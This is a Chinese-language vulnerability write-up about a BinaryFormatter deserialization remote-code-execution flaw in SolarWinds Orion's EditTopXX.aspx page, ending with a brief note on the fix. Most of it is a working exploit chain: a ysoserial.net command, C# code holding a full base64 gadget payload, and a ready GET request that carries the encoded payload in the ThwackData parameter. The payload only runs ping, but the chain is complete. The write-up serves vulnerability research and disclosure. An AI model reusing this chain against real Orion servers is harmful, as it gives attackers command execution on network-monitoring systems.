分析

同样是使用了Serializer.Deserialize<T>(string serializedObject)

漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs

1.png

同样调用 binaryformatter

2.png

ysoserial.net生成payload可以直接打,需要注意只能用get请求发包,所以要用最小的payload。

1ysoserial.exe -f binaryformatter -g  RolePrincipal --minify -c "ping localhost -t"

然后编码

 1using System;
 2using System.IO;
 3using System.Runtime.Serialization.Formatters.Binary;
 4using System.Text;
 5using System.Web;
 6using System.Web.Mvc;
 7
 8namespace WebApplication1.Controllers
 9{
10    public class HomeController : Controller
11    {
12        public ActionResult Index()
13        {
14            var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
15                "AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAANgFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUNIQXp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QndhVzVuSUd4dlkyRnNhRzl6ZENBdGRDSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL"));
16            Response.Write(payload);
17            return View();
18        }
19    }
20
21    public class Serializer
22    {
23        // Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
24        public static string Serialize(object parameters)
25        {
26            string result;
27            using (MemoryStream memoryStream = new MemoryStream())
28            {
29                new BinaryFormatter().Serialize(memoryStream, parameters);
30                result = Base64Helper.Base64Encode(memoryStream.ToArray());
31            }
32
33            return result;
34        }
35
36        // Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
37        public static T Deserialize<T>(string serializedObject)
38        {
39            T result;
40            using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
41            {
42                result = (T) ((object) new BinaryFormatter().Deserialize(stream));
43            }
44
45            return result;
46        }
47    }
48
49    internal class Base64Helper
50    {
51        // Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
52        public static string Base64Encode(byte[] str)
53        {
54            return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
55        }
56
57        // Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
58        public static byte[] Base64Decode(string str)
59        {
60            byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
61            return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
62        }
63    }
64}

构造请求如下

1http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1

RCE

3.png

问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。

修复

4.png

改用DataContractSerializer处理序列化,并限定KnowsType。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。